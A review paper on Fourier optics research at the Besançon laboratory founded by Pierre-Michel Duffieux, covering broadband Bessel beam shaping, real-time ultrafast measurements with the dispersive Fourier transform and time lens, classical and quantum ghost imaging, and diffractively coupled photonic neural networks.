abstract: 'The concepts of Fourier optics were established in France in the 1940s by Pierre-Michel Duffieux, and laid the foundations of an extensive series of activities in the French research community that have touched on nearly every aspect of contemporary optics and photonics. In this paper, we review a selection of results where applications of the Fourier transform and transfer functions in optics have been applied to yield significant advances in unexpected areas of optics, including the spatial shaping of complex laser beams in amplitude and in phase, real-time ultrafast measurements, novel ghost imaging techniques, and the development of parallel processing methodologies for photonic artificial intelligence.'
author:
- 'Luc Froehly, François Courvoisier, Daniel Brunner, Laurent Larger, Fabrice Devaux, Eric Lantz, John M. Dudley, Maxime Jacquot$^{*}$'
bibliography:
- 'Biblio\_Duffieux.bib'
title: 'Advancing Fourier: space-time concepts in ultrafast optics, imaging and photonic neural networks'
---
Introduction
============
The description of light as an electromagnetic wave was developed by Maxwell in the 1860s, and led to a fundamental change in the way in which optical phenomena were studied and understood. With the oscillatory nature of light established, it became possible to apply new mathematical tools to quantify experiments, and it was not long before the concepts of wave decomposition were applied by Rayleigh and Abbe to the study of resolving power [@Hawkes-1997]. More rigorous and systematic approaches to applying the tools of Fourier analysis in optics were developed in the 1930s, and in 1946, the first complete textbook on what we now describe as Fourier optics was published in French by Pierre-Michel Duffieux [@Duffieux-1946].
Although this work was very influential in the French community, Duffieux’s contributions were largely unappreciated on the international stage until 1959 when Born and Wolf drew attention to them in their seminal work [ *Principles of Optics*]{} [@Born-1959]. Even so, Duffieux’s role in developing these ideas is often forgotten because Duffieux’s book was only translated in 1983 [@Duffieux-1983], long after many excellent and independent treatments of Fourier optics had appeared in English [@Goodman-1968; @Papoulis-1968; @Gaskill-1978]. Yet Duffieux’s neglect is undeserved and unfortunate because, as Emil Wolf himself has stated, “Pierre-Michel Duffieux deserves to be remembered as the true originator of the field of Fourier Optics.’’ [@Hawkes-1997]
Moreover, within the optics laboratory that he founded in Besançon in France, Duffieux had tremendous influence on generations of researchers and students. Indeed, work in Besançon in the 1960s led to some of the first studies of holography and spectral interferometry [@Froehly-1967; @Froehly-1973], with the results in Ref. [@Froehly-1973] being especially important in transferring impulse response and transfer function concepts from the spatial to the temporal domains. As we shall see below these results have seen important application in areas such as ultrafast pulse measurements, and the concept of spectral interferometry itself is now ubiquitous in many areas of optics, notably in the field of frequency-domain optical coherence tomography [@Leitgeb-2003]. Other work in the 1970s and 1980s saw the development of novel proposals to apply Fourier techniques to the shaping of ultrashort laser pulses [@Colombeau-1976; @Froehly-1981], as well to optical information processing and handwriting recognition [@Vienot-1976].
Many of these early ideas, however, have seen widespread application only recently with technological developments in sources and instrumentation, but Duffieux’s legacy continues strongly in Besançon with active research programmes applying Fourier concepts to many state-of-the-art applications. In this paper, we present an overview of our recent work in several different areas, including the spatial shaping of complex laser beams both in amplitude and in phase, measurement of the temporal properties of ultrafast light fields, novel ghost imaging techniques, and the development of parallel processing methodologies for photonic artificial intelligence.
The intention of this paper is to showcase a selection of this work, providing a contemporary overview of research from the laboratory that Duffieux himself established in order to develop experimentally the ideas that he had earlier described mathematically. We anticipate that the main impact of this paper will be to show how basic and general concepts in optical physics can find wide and often unexpected applications, and in fields unanticipated by those who initially developed them. In what follows, the treatment of these different topics is largely self-contained, but it is our hope that they provide a clear demonstration of how Duffieux’s pioneering ideas have now become universal in many central areas of today’s optics and photonics.
Spatial shaping of broadband beams
==================================
Spatial beam shaping has now become an indispensable tool in many areas of research in optics, with much of its recent success being based on the development of convenient techniques for the design and tailoring of specific spatial beam properties by manipulating the amplitude and phase of spatial frequency components. In this section, as a particular example, we focus on spatially-tailored Bessel beams which have found wide use in a number of applications, including microscopy [@Fahrbach-2010], optical trapping [@Garces-Chavez-2002], and laser material processing [@Stoian-2018]. A particularly important application field is ultrashort pulse laser “stealth dicing” of transparent materials such as glass which enables for instance cutting coverglass for consumer electronics at very high speed (up to meters per second) [@Meyer_2019; @Courvoisier_2016]. The Bessel beam transverse profile consists of a strongly-localized central “hot spot” surrounded by a large number of concentric circular rings. The central lobe possesses an extremely high aspect ratio maintained over propagation distances exceeding the Rayleigh range (of a conventional Gaussian beam with the same transverse extent) by orders of magnitude [@Durnin-1987; @McGloin-2005; @Bock-2012].
For many applications, it is desirable to generate Bessel beams with a broadband spectrum while preserving the same lobe size (and the position of the intensity zeros in the profile) – over the full spectral extent. These applications include those such as material processing using ultrashort pulses, Optical Coherence Tomography (where the highest imaging resolution is obtained for the broadest spectrum) and the generation of “X-wave” structures [@Saari-1997; @Zamboni-Rached-2004]. Several groups have previously investigated broadband, or “white” Bessel beams, but the full superposition of the different frequency components was effective only on the optical axis. Off-axis, the fringes were polychromatic [@Fischer-2005].
In this section, we describe how the Fourier formalism allows us to shape Bessel beams out of broadband laser sources. Particularly useful is the property of convex lenses to be perfect “Fourier-Transformers” in the paraxial regime, as was pointed out by Duffieux. Indeed, if the scalar field amplitude in the object focal plane of a lens of focal length $f$ is $A(X,Y)$, then the amplitude in the image focal plane is: $$B(x,y) = \iint{A(X,Y) e^{-\imath 2\pi \frac{(Xx+Yy)}{\lambda f}}dXdY}
\label{fourierplane}$$
In other words, the latter field $B$ is the perfect Fourier-transform of $A$ with $B(x,y)=\tilde{A}(\nu_x,\nu_y)$, where the spatial frequencies are defined as $\nu_x =x / (\lambda f)$,$\nu_y = y/(\lambda f)$ We note that placing a second lens in confocal configuration (i.e. we have a $4f$-system) now implements a second Fourier transformation, which gives in the image focal plane of the second lens the initial amplitude $A(X,Y)$. In the common focal plane, “Fourier filtering” can easily be implemented , as we will use later here.
An ideal Bessel beam has a cylindrically-symmetric transverse intensity profile of the form $|J_0(2 \pi \nu_0 r)|^2$, with $r$ the radius in cylindrical coordinates, and where $\nu_0 = \frac{\sin \theta}{\lambda}$ is the spatial frequency with $\theta$ the [*cone*]{} angle of the Bessel beam at the wavelength $\lambda$. The Fourier transform of a Bessel beam is a ring of radius $\nu_0$, experimentally observed in the Fourier plane as a ring of radius $r_0=\lambda f \nu_0 = f \sin\theta$. Creating a broadband Bessel beam requires that this intensity distribution is invariant with wavelength, which is equivalent to requiring that the radial spatial frequency $\nu_0$ must also be invariant with wavelength. Hence, $\sin \theta(\lambda)$ should be proportional to $\lambda$.
In practice, reflective or refractive axicons commonly used to generate Bessel beams cannot produce broadband (white) Bessel beams as defined above [@Boucher-2018; @McLeod-1954]. The reason is that the phase imposed by such optical elements generates, at zeroth order in dispersion, a fixed cone angle $\theta$ (variation of spatial frequency inversely with wavelength.), such that the surrounding lobes are colored [@Fischer-2005]. Methods based on spatial light modulator (SLM) involving a reference wave are also limited because of the necessary compensation of the tilt with a prism, where the actual refractive index largely varies over the visible spectrum [@Leach-2006]. In contrast, we seek a method where the phase pattern is spatially independent of wavelength.
We use an approach derived from Lord Rayleigh’s pioneering work [@Rayleigh-1889] where he was able to produce achromatic interference fringes using a Lloyd’s mirror configuration combined with a diffraction grating together with a broadband light source. Specifically, we apply to the incoming broadband beam a phase mask in the form $\phi(r) = \frac{2\pi}{\lambda}T\delta n$ where $\delta n \sim J_0(2\pi \nu_0 r)$ is the local index variation, $T$ is the optical path length over the liquid crystal film thickness. For sufficiently small phase shifts, the amplitude at the output of the phase mask is on the form: $A(r) = A_0 (1+ J_0(2\pi \nu_0 r))$. Fourier filtering allows for selecting the second term. Indeed, a first convex lens realizes the Fourier transform of the beam after its reflection on the SLM. The intensity pattern in the Fourier space consists of a point (first term) at the center of an annulus (second term). A beam block at the center and an iris enable selecting only the annulus. A second Fourier transform is made using another lens to obtain a Bessel beam with fixed spatial frequency $\nu_0$ as desired. The diffraction grating-like structure produced here does introduce the necessary linear dependence of the $\sin \theta$ with the wavelength. We note that in this approach, the impact of wavelength is limited only to the diffraction efficiency, which varies smoothly over the spectrum.
![\[fig:Bessel\] (a) Intensity distribution of the Bessel beam with the full supercontinuum spectrum. The longitudinal propagation distance $z$ is measured from the image of the SLM mask in $z=0$. (b) Transverse $(x,y)$ cross-section of the Bessel beam at position $z=-0.66~ mm$. The gray solid line shows a horizontal line-cut through the intensity transverse profile. (c) Normalized intensity profiles obtained for three narrow-band spectra centered respectively at 600, 700 and 800 nm wavelength.(inset) Solid black line shows the full supercontinuum spectrum. The three narrowband spectra used in (c) are also plotted. ](Bessel_blanc.pdf){width="48.00000%"}
Experimentally, we generate broadband Bessel beams using a supercontinuum source laser (LEUKOS SMHP-40-2-B) and a Spatial Light Modulator (SLM Hamamatsu X13138, with 1280 $\times$ 1024 pixels). The source spectrum is freely adjustable in terms of central wavelength and bandwidth via translating filters (LEUKOS BEBOP). The phase mask is illuminated under normal incidence using a cube to separate input and output optical paths. A 2f-2f optical arrangement ($f_1$=200 mm and $f_2$ = 9.5 mm) is used to de-magnify the Bessel beam. In the Fourier plane of the first lens, we select the Bessel beam Fourier transform, [*i.e.*]{} a ring, from spurious orders of diffraction. We image the Bessel beam produced using a microscope objective, a relay lens with overall magnification factor of 10 and a CMOS camera mounted on a motorized translation stage as in reference [@Froehly2014].
We remark that in the focal plane of a lens that materializes the Fourier plane, the radius of this ring is expressed as $R={f~\nu_0\lambda}/{\sqrt{1-(\lambda\nu_0)^{2}}}$ where $f$ is the focal length of the lens that produces the Fourier transform. Hence, each individual wavelength creates a Bessel ring with a different radius $R$, even if all have the same spatial frequency $\nu_0$.
We generate a Bessel beam with more than 200 nm bandwidth, measured at Full Width at Half-Maximum (FWHM), centered at 750 nm. The supercontinuum spectrum is shown in the inset of Fig.\[fig:Bessel\](c) (solid black line). The effective spatial frequency of the Bessel beam is $\nu_0=100$ mm$^{-1}$ (using the de-magnification factor of $\frac{1}{21}$ between the SLM plane and its image at the focal plane of the second lens). In Fig.\[fig:Bessel\], we plot the evolution of the measured intensity distribution with propagation distance. In Fig.\[fig:Bessel\](a), we show the experimental $(x,z)$ cross-section of the beam intensity recorded using the full input spectrum. A 7 mm long Bessel beam is generated with a central lobe size of 10 $\mu$m. The contrast of the lobes is high ($\sim$ 0.8 to 0.9), even if the input spectrum spans over more than 200 nm. This is even more apparent from the transverse cross sections shown in Fig.\[fig:Bessel\](b).
To demonstrate the invariance of the position and contrast of the Bessel beam lobes with wavelength, we have independently recorded, using the same phase mask, the cross section corresponding to three narrowband input spectra, centered at 600, 700 and 800 nm with $\sim$ 5 nm bandwidth FWHM. We plot in Fig. \[fig:Bessel\](c) the normalized intensity cross sections. It is apparent that the lobes are quasi identical, even up to $\sim$ 60 $\mu$m from the optical axis. Small chromatic effects, in the noise limit, remain in our experiment. However, we stress that this is due to the imaging lenses which are not achromatic and not to the generation of the Bessel beam itself. The chromatism induces a variation in the magnification factor of about 1% over the 200 nm bandwidth (experimentally characterized). This could be avoided using an imaging system fully based on reflective optics.
In conclusion, the application of the classical tools of Fourier optics has allowed us to generate a Bessel beam with more than 200 nm spectral bandwidth, spatially extending over more than 7 mm with a central lobe diameter of 10 $\mu$m FWHM. This corresponds to an aspect ratio of 1:700. We believe this will open new perspectives for applications of Bessel beams to microscopy, optical coherence tomography and ultrafast physics [@Blatter-2011; @Yu-2015].
Real-time measurements of non-repetitive signals
================================================
The concepts of Fourier optics are widely applied to manipulate and measure the temporal properties of ultrafast light fields by exploiting the analogy between diffraction in space and dispersion in time. The power of this “space-time analogy” was appreciated in numerous early works [@Froehly-1981], and practical techniques for Fourier-transform pulse shaping are now widespread [@Weiner-2009]. Recent years have seen particular progress applying space-time concepts to develop experimental techniques to measure ultrafast spectral and temporal instabilities in real-time, and such methods are rapidly becoming standard in the characterization of a wide range of nonlinear propagation phenomena [@Solli-2007; @Solli-2012; @Wetzel-2012; @Suret-2016; @Narhi-2016; @Tikan-2018; @Ryczkowski-2018].
The first technique of this sort that saw widespread use was the Dispersive Fourier Transform (DFT) which enables the convenient measurement of real-time spectra at MHz repetition rates [@Goda-2013]. This principle of the DFT uses the fact that a pulse propagating in a linear dispersive medium evolves towards its Fourier transform with sufficiently large value of quadratic spectral phase (from group velocity dispersion). This is exactly equivalent to the spatial phenomenon where far-field diffraction from an arbitrary spatial mask yields the corresponding spatial Fourier transform.
In particular, consider a pulse propagating in an optical fiber with temporal envelope $A(z,t)$, where $z$ is distance and $t$ is co-moving time (i.e. in a frame of reference moving at the pulse group velocity). If $A(z,t) \leftrightarrow \tilde{A}(z,\omega)$ defines the corresponding spectral amplitude through a Fourier transform, then the effect of purely dispersive propagation on an incident field \[with spectrum $\tilde{A}_0(\omega) =\tilde{A}(z=0,\omega)$\] is to introduce a quadratic spectral phase: $$\tilde{A}(z,\omega) = \tilde{A}_0(\omega)\, e^{\frac{i}{2}\beta_2\,z\,\omega^2}.$$ If we now apply the inverse Fourier transform to determine the corresponding time-domain field and assume a large value of dispersion $\beta_2\,z$, then we can use the stationary phase approximation or steepest descent method to show the mathematical equivalence $|A(z,t)|^2 \propto |\tilde{A}_0(t/\beta_2\,z)|^2$ which also provides the frequency to time scaling $\omega = t/(\beta_2\,z)$ [@Grigoryan-2000]. This relation describes how the timebase of the temporally dispersed (stretched) pulse can be related to the optical frequency.
A typical DFT experimental setup considers a fluctuating field typically of 10’s of picosecond duration that is injected at low power into a length of optical fibre such that at the fibre output it has stretched to a duration of 5-10 ns. It is this stretched field that has the functional form of the corresponding power spectrum, and can be conveniently measured using a suitable high speed detector and oscilloscope system (with typically 10s of GHz bandwidth). The DFT technique attracted particular attention in 2007 when it was used to reveal the presence of extreme value “rogue wave” fluctuations in the spectra of broadband supercontinuum light generated in photonic crystal fiber [@Solli-2007].
![Typical results from simultaneous DFT and time-lens characterization of fibre laser start-up dynamics (see also Ref. [@Ryczkowski-2018]). (a) shows emergence of a 2-soliton state where the two components separate then merge before sudden decay. (b) shows a 3-soliton state where the components evolve independently before decay. Left and right columns show the measured spectra and temporal intensity profiles respectively.](Figure2small.pdf){width="50.00000%"}
Complementing the application of the space-time analogy to the development of DFT to measure real-time spectra, parallel work has developed time-domain systems equivalent to the thin lens to allow direct detection of transient ultrafast temporal processes [@Froehly-1981; @Kolner-1989]. The concept of the “time lens” takes an incident picosecond field, stretches it in a length of dispersive fiber, applies a quadratic temporal phase, and then stretches it again in a second length of dispersive fiber. By matching the dispersive fiber lengths to the magnitude of the applied phase [@Salem-2013], it is possible to create an equivalent temporal imaging system that magnifies picosecond pulses to the nanosecond domain whilst maintaining their intensity profile. Using a suitable high speed detector and oscilloscope system (with typically 10s of GHz bandwidth) the time-lens approach has been successfully applied to measure temporal instabilities in both modulation instability [@Narhi-2016] and optical turbulence [@Suret-2016]. The time lens idea can be combined with spectral interference with a reference field (holography) to also yield intensity and phase information [@Tikan-2018].
In our recent work, we have combined the DFT and time-lens methods to simultaneously characterize the instabilities observed during start-up dynamics in a passively modelocked fiber laser, and the results in Fig. 2 illustrate typical results that have been obtained by recording real-time spectra and temporal intensity profiles over 100s of cavity roundtrip times after the laser pump diode was switched on during a phase of Q-switched mode-locked operation prior to stabilization. Full details are to found in Ref. [@Ryczkowski-2018]. The results show: (a) the emergence of a 2-soliton state where the two components separate then merge before sudden decay and (b) a 3-soliton state where the components evolve independently before decay. Left and right columns show respectively the measured spectra and temporal intensity profiles respectively. The coherence between the soliton structures seen in the time domain is manifested in the clear modulation in the measured fringes. These results are remarkable in revealing the highly complex nature of dissipative soliton interactions that occur in modelocked lasers, and which have not been possible to observe directly before the development of real-time techniques such as DFT and the time-lens [@Grelu-2012].
Classical and Quantum Imaging {#sec:quantum imaging}
=============================
The previous section described how the space-time analogy first introduced in the 1970s [@Froehly-1973] has been applied to the field of ultrafast optics. But it has also been extremely influential in extending and developing several ideas in classical and quantum spatial imaging into new domains. The basis of Fourier optics consists of applying to a spatial image, concepts originally developed for temporal signals. This includes, for example, developing the formalism describing a transfer function of spatial frequencies instead of temporal frequencies. It means that patterns in an image can be considered as a spatial signal, in contrast (not in contradiction) with the point of view where an image conveys a great number of (temporal) channels in parallel. We present in the following some milestones of this approach, by strengthening, when relevant, the differences with the alternative point of view described above.
Parametric image amplification
------------------------------
An image of a transparent object is formed on a $\chi^{(2)}$ crystal by light issued from a laser and interacts in the crystal with a collimated pump formed by the second harmonic of the same laser. Parametric down-conversion of the pump photons leads to image amplification, provided that phase matching is fulfilled in the crystal. The amplified image is detected with a CCD camera. We have shown [@devaux_transfer_1995] that a simple crystal rotation is enough to pass, for the spatial frequencies, from a low-pass amplifier to a band-pass amplifier. In this latter configuration, the edges of the object are the most amplified. For short pulses, the image, formed by the idler, is generated only during the interaction with the pump, resulting in time-gating properties: see [@lantz_parametric_2008] for a review.
Spatially noiseless image amplification
---------------------------------------
If both the signal and idler are injected in the crystal, the amplification is noiseless, i.e. preserves the signal to noise ratio because of the absence of a quantum noise channel at the crystal input. We have shown in [@mosset_spatially_2005] that pure spatial fluctuations recorded by a camera do obey noiseless amplification, in contrast with [@choi_noiseless_1999], which showed that the signal-to-noise ratio is preserved on the image, where the considered noise was temporal, recorded by a photodiode successively at the different points of the image. This is a first clear illustration of the difference between the two points of view summarized above.
Einstein-Podolsky-Rosen (EPR) paradox in single pairs of images
---------------------------------------------------------------
Properties of fluctuations in quantum mechanics are described by ensemble averages, which are often estimated by time averages if the signal is stationary in time, but which can also be estimated by spatial averages if the signal is stationary in space on a sufficiently large area. Most of the experiments in quantum imaging record averages of temporal coincidences, i.e. characterize the spatial distribution of temporal averages, rather than spatial averages, in agreement with the point of view considering an image as an ensemble of information channels [@howell_realization_2004]. In [@lantz_einstein-podolsky-rosen_2015], we have demonstrated that an Einstein-Podolsky-Rosen (EPR) paradox results from strong spatial correlations between photons of a pair in both the image and the Fourier plane by using only one pair of images in each plane. We can conclude that an image conveys quantum information by itself, without any need to employ a set of images: the ensemble average is obtained by ”repeating the experiment” over the different resolution cells, or spatial modes, of the image. This study uses directly the concepts of Fourier optics. Indeed, the transverse momentum $p_x$ of a photon is directly recorded in the Fourier plane, since $p_x = \hbar k_x=h \nu_x=h \, x / (\lambda f)$, where $h$ is the Planck constant, $k_x$ a transverse coordinate of the wave vector, $f$ the focal length and $x$ a coordinate in the Fourier plane, as in (\[fourierplane\]). If $X$ is, as in this equation, the corresponding coordinate in the object plane , the Heisenberg principle $\Delta_X \Delta p_x> \frac{\hbar}{2}$ can then be translated in Fourier optics as $2 \pi\Delta_X \Delta \nu_x > \frac{1}{2}$. This latter relation is well known in signal processing as the minimum product of the extensions of a signal in the direct and the Fourier space [@Cohen_1989]. Hence, the Heisenberg principle can be viewed in optics as the conjunction of diffraction laws of wave optics, i.e. the duality between the resolution in the direct and Fourier space, with the corpuscular nature of light. The EPR paradox means that correlations due to entanglement allow an apparent violation of this principle, when considering the conditional variances.
Temporal ghost imaging by image cross-correlations
--------------------------------------------------
Ghost imaging (GI), whether quantum or classical, is an archetypal example of the second point of view developed above. In the reference arm, a channel of the image (a pixel) is recorded with temporal resolution by a photodiode, without interaction with the object. Crucially, the temporal signal is random, either because of its quantum nature or because of classical fluctuations, for example of a (pseudo) thermal signal. In the test arm, the different channels corresponding to the different pixels are transmitted by the object and summed together on a bucket detector, without spatial resolution but with temporal resolution. The value of the object for a pixel is retrieved by cross-correlation of the reference and test signals, thanks to the identical temporal fluctuations of the reference channel and of the part of the test channel that is associated with the considered pixel. The only difference between quantum GI [@pittman_optical_1995] and thermal GI [@ferri_high-resolution_2005] is that in the first case the identity of fluctuations is due to twin photons while, in the second case, the fluctuating beam is simply divided in two by a beam-splitter, or computed in the case of computational GI [@shapiro_computational_2008].
Considering an image as a fluctuating signal leads naturally to temporal GI. The “object” to retrieve is now a temporal transparency, with different levels succeeding in time. On the reference arm, successive random images are recorded, or computed, with temporal and spatial resolution. On the test arm, each image is multiplied by the corresponding temporal level of the object and summed with the other images on a camera, with spatial resolution but no temporal resolution. The temporal object is retrieved by cross-correlation of the successive images with the summed image. Note the exact space-time transposition between GI and temporal GI. We have demonstrated computational temporal GI [@devaux_computational_2016], temporal GI with speckle images [@devaux_temporal_2016] and quantum temporal GI [@denis_temporal_2017].
Temporal GI refers also to GI entirely in the temporal domain [@ryczkowski_ghost_2016]. In the test arm, the light is transmitted through the “time object” and detected with a slow single pixel detector (SPD) that cannot properly resolve the time object. In the reference arm, the light that does not interact with the temporal object is detected with a fast SPD. This scheme and the scheme developed in [@devaux_computational_2016; @devaux_temporal_2016; @denis_temporal_2017] have each their own advantages and drawbacks. The main advantage of the latter consists of the replacement of thousands of synchronized replicas of the temporal signal required in [@ryczkowski_ghost_2016] by the use of a detector array with thousands of pixels (the camera). Its drawback is the slowness (at most 27 Khz in [@devaux_temporal_2016]) that prevents its use to cancel dispersion effects as developed in [@ryczkowski_ghost_2016].
Conclusion of this section
--------------------------
The works reported in this section result from the crossing of the local tradition of Fourier optics with recent developments in nonlinear and quantum imaging (note nevertheless that classical GI is pure linear imaging). In particular, the space-time transpositions have been systematically developed, resulting for example in the notion of spatial coincidences detected with single photon sensitive cameras, as an alternative to temporal coincidences detected with time-gated fast detectors. Since the image is considered as a spatial signal, the bi-dimensional Fourier transform is present in all stages of the studies. Some examples are the following. A split-step algorithm is used to simulate the effect of diffraction and of the nonlinear interaction in the crystal. At each step, the non linear interaction is taken into account in the direct space, while a Fourier transform in the transverse plane allows the propagation of the plane wave spectra. Results extend from the calculation of the transfer function due to phase matching to the computation of quantum correlations that build in the crystal. On the experimental side, all cross-correlations of twin images are calculated by multiplications in the Fourier domain.
Optical computing and photonic neural networks {#sec:PhotNN}
==============================================
![\[fig:NNdiff\] (a) Two layers of neurons (circles) connected into a neural network. The state of neurons in the left layer serves as input for the layer on the right. (b) Similar coupling can be implemented in a telescope of two infinity corrected microscope objectives (MO1&2), where a diffractive optical element (DOE) located in the beam-path creates the connections in parallel. This system was used to demonstrate learning in the context of a recurrent neural network [@Bueno-2018].](DifCouplNN.pdf){width="50.00000%"}
Photonic implementations of neural networks have experienced a revival in recent years [@VanderSande-2017]. While the exploding interest in neural networks was stimulated by novel applications and concepts [@LeCun-2015], the motivation for optical neural networks remains the one of the original efforts in the 1980s [@Farhat-1985]: an advantage of photonics in terms of parallelism and signal transmission when compared to electronics [@Lohmann-1990].
Photonic systems have recently revolutionized the hardware implementation of Recurrent Neural Networks and Reservoir Computing [@Jaeger-2004], in particular. The fundamental principles of Reservoir Computing strongly facilitate a realization in such complex analog systems. Especially delay systems [@duvernoy1987bistabilite; @larger2010], which potentially provide numerous degrees of freedom, can efficiently be exploited for information processing applied to photonic neural networks [@martinenghi2012; @larger2017].
We also demonstrated other architectures that consider a neural network’s fundamental features, see Fig. \[fig:NNdiff\](a), taking into account the potential of photonics and the relevance of Fourier optics. A neural network’s purpose is to compute, which corresponds to nonlinearly mapping input information onto the desired result. For most tasks this mapping is non-trivial, yet it can be decomposed into a series of simple nonlinearities weighted by coefficients - much like in a polynomial series approximation. Neurons provide the simple nonlinearities, while the scaling-coefficients correspond to weighed connections which define the network’s topology. In principle, nonlinearities can be scaled and summed in parallel, and accordingly neural networks are parallel computing concepts.
Many nonlinear photonic components can serve as a neuron in principal. The challenge is realizing parallel network connections, which is where the advantage of the non-interacting photons comes into play. A simple telescope of two microscope objectives (MO1, MO2), schematically illustrated in Fig. \[fig:NNdiff\](b), images neurons located in the object plane ($O$) onto the image plane ($I$). Within the collimated space between MO1 and MO2, the $n$th neuron’s planar wave front is identified by transversal wavevector $k^{T}_{n}=k^{0} x^{O}_{n} / f_{1}$, with $x^{O}_{n} = n d$. Focusing by MO2 creates the photonic neuron’s image at $x^{I}_{n} = f_{2} k^{T}_{n} / k^{0}$. Here, $f_{1}=20~$mm and $f_{2}=18~$mm are the focal distance of MO1 and MO2, respectively. Coupling neuron $n$ to neuron $m$ requires their fields to spatially overlap in plane $I$, hence a coupling mechanism incorporated between MO1 and MO2 needs to contribute $\Delta k^{T}_{n,m} = k^{T}_{m} - k^{T}_{n}$. Since emission of photonic neurons traverses the optical system simultaneously without interaction, coupling is established fully in parallel.
Early experiments with photonic Hopfield networks created the $\Delta k^{T}$s optimized for a specific task using volume holograms [@Farhat-1985]. The holographic coupling concept can in principle be extended to deep neural network trained by gradient back-propagation [@Wagner-1987]. For that, the phase-conjugated version of the desired output is propagated through the optical system in a backward direction, writing the hologram of the coupling matrix required in the forward direction. However, it was realized that these powerful approaches were not scalable in terms of energy-cost and system size.
Recently, the reservoir computing concept enables using a complex, yet not task-specifically optimized nonlinear network. The optimization during learning is restricted to the final connection matrix, which strongly reduces the complexity for hardware implementations [@Jaeger-2004]. We demonstrated that such coupling can be created by a single, off-the-shelf diffractive optical element (DOE) [@Bueno-2018]. In its action, the DOE is a diffraction grating with a particular intensity distribution across diffractive orders. It is therefore a periodic phase modulation which creates the $\Delta k^{T}$s. However, this diffraction based technique results in a continuously increasing mismatch $\Delta x_{n}$ between $x^{I}_{n}$ and the ideal position $n d f_{2} / f_{1}$, see Fig. \[fig:NNdiff\](b). Using $B = \frac{n d}{\sqrt{{f_1}^2+n^2 d^2}} + \frac{\lambda}{p^{DOE}}$, we find $$\label{eq:Delta}
\Delta x_{n}= \frac{f_{2}}{f_{1}}(n+1)d - \frac{ B f_2}{\sqrt{1- B^2}},$$\
where in our experiment $p^{DOE}=0.9~$mm and $\lambda = 662.1~$nm. The blue line in Fig. \[fig:CiffCplSimExp\] shows that mismatch $\Delta x_{n}$ for an emitter position $x^{O}_{n} < 5~$mm remains below 1$~\mu$m. The mismatch is therefore of the order of a single mode emitter’s radius, corresponding to the limit beyond which coupling is lost.
![\[fig:CiffCplSimExp\] Coupling mismatch $\Delta x_n$ in diffractively coupled photonic networks. Analytical (blue line), experimental (black symbols) and numerical simulations (red symbols) excellently agree. Red circles are based on numerical simulations with identical microscope objectives as in the experiment (black circles). The red stars are based on numerical simulations replacing MO1 with a higher numerical aperture model with identical magnification [@Maktoobi2020]. Black stars are experimental results based on rotating the DOE, hence avoiding beam vignetting.](DifCouplSimExp.pdf){width="40.00000%"}
A more complete evaluation of networks formed by diffraction requires a model for the propagating optical fields with a sensitivity and accuracy of $\Delta x_{n}\leq 1~\mu$m for $x^{O}_{n}>5~$mm. Considering the typical focal distance of microscope objectives this rules out paraxial approximations, and propagation between MO1 and MO2 requires the non-paraxial propagation of the planar wave spectrum $A(\nu_{x},\nu_{y})$ [@Goodman-2017]. Here, $\nu_{x}$ and $\nu_{y}$ are the spatial frequencies of the planar wave spectrum. Propagating from one plane to the next is obtained by Fourier transformations ($\mathcal{F}$) of the field, with a phase shift according to $\exp\left(i2\pi z \sqrt{\frac{1}{\lambda^2} - v_x^2-v_y^2}\right)$. Beam propagation between MO1 and MO2 along the z-direction is computed according to:
$$\label{eu_eqn}
A(x,y,z)=\mathcal{F}\left\lbrace A(\nu_{x},\nu_{y})\exp\left(i2\pi z \sqrt{\frac{1}{\lambda^2} - v_x^2-v_y^2}\right) \right\rbrace$$
The DOE’s effect is included as an additional phase modulation, while propagation through the high numerical aperture microscope objectives is efficiently realized with the Debye integral method [@Born-2013; @Wolf-1981; @Sheppard-2000; @Leutenegger-2006]. Crucially, the Debye integral relates a microscope objective’s image plane coordinates to spatial frequencies according to $x^{I}|y^{I}=\lambda f_{2}\nu_{x|y}$. This corresponds to the paraxial approximation, and a correction according to $x^{I}|y^{I} = (\lambda f_{2} \nu_{x|y}) / {(\sqrt{1-\lambda^{2} (\nu_{x|y})^{2} }}$ is required.
Black data in Fig. \[fig:CiffCplSimExp\] show experimental results of the diffractive coupling scheme, which agree exceptionally well with numerical simulations (red data) based on identical parameters. Two different systems were compared. Using a low NA MO1 (NA<0.2, black circles in Fig. \[fig:CiffCplSimExp\]) causes beam vignetting during collimation, and the resulting diffraction at the clear aperture’s edge causes strong deviation from the analytical expression of $| \Delta x_{n} |$, blue line in Fig. \[fig:CiffCplSimExp\]. This effect is correctly described by the numerical algorithm, see red circles. By tilting the DOE we emulated collimated beam angles of photonic neurons at different positions, crucially avoiding beam vignetting as the collimated beam remains centered, and experimental results are shown as black stars. Replacing MO1 with a high NA, low magnification microscope objective removes the vignetting effect for photonic neurons inside a much larger area, as confirmed by numerical simulations (red stars). Numerically and experimentally obtained data for systems avoiding vignetting perfectly follows the analytical description. Non-paraxial Fourier techniques therefore very accurately describe diffractive photonic networks spanning areas of $\sim 25~$mm$^2$, providing a resolution and sensitivity significantly better than $1~\mu$m. Considering a realistic spacing of $10~\mu$m between photonic emitters, this confirms diffractive coupling concepts for networks hosting approximately half a million optical nodes.
We have demonstrated diffractive networks consisting of semiconductor lasers [@Brunner-2015] and the pixels of a SLM [@Bueno-2018]. The latter system was amended with a digital micro-mirror device which implemented adjustable readout weights. Combined with a evolutionary learning algorithm, we trained a network of 900 photonic neurons to perform the prediction of a chaotic sequence. The possibly large network size and low complexity makes diffractive coupling an excellent technique for a wide range of systems and applications.
Conclusions
===========
The widespread application of Fourier concepts in optics is not surprising from a modern perspective, but it is difficult to imagine a pioneer such as Duffieux envisaging their use in fields so removed from traditional image formation. Many of the areas discussed above are finding significant applications in a remarkable range of different fields. For example, the ability to shape and control the spatial structure of high-power femtosecond Bessel beams is being actively applied to important uses in material processing, and spatial shaping concepts with purely linear optics are opening up new possibilities in the design of new paradigms in optical artificial intelligence. The real-time measurement technique of the DFT and the time lens are being used to gain new insights into several different classes of optical instability, including the emergence of extreme events in systems other than optics - such as the celebrated rogue waves on the ocean and in hydrodynamics [@Dudley-2014].We hope that the results described above have clearly shown how a clear physical understanding of Fourier optics can lead to significant results that touch on areas of photonics and optics that are both relatively well established (such as Bessel beam shaping) to those that have appeared only recently (such as in photonic artificial intelligence). Of course the underlying principles of our experiments have been understood for decades, and it has rather been the recent availability of new technologies in areas such as spatial light modulators that have allowed their practical implementation. Indeed, as experimental developments continue, there is every reason to expect that even more unexpected applications will emerge. But whilst research must always be forward-looking and seek new applications for the future, it is our hope that the work of those that paved the way will not be forgotten.
Acknowledgments
===============
We would like to acknowledge discussions and valuable contributions from a number of co-workers, especially: G. Genty, P. Ryczkowski, C. Billet, and L. Furfaro.
